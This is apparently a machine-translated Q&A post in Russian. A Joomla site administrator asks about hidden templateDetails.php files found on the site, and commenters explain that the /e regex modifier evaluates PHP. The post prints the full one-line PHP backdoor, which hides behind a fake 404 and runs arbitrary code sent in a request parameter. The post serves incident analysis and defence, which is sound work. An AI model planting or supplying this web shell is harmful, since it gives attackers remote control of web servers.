Я только что нашел на установке Joomla сайта я управляю много templateDetails.php файлов, скрытых внутри различных папок с помощью следующего кода:Что означает код и как его могут использовать злонамеренные хакеры?
<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>
Я быстро восстановить резервную копию сайта, изменил все пароли администратора и армированное безопасность на веб-сайте.
Можете ли вы объяснить мне, как этот тип кода используется для похищения или повреждения веб-сайта?
Возможно релевантный - http://stackoverflow.com/questions/2142497/whats-wrong-with-using-request –
Он использует флаг '' '' (http://php.net/manual/en/ reference.pcre.pattern.modifiers.php) к функциям PCRE, которые оценивают PHP-код в регулярном выражении, что позволяет выполнять произвольный код. –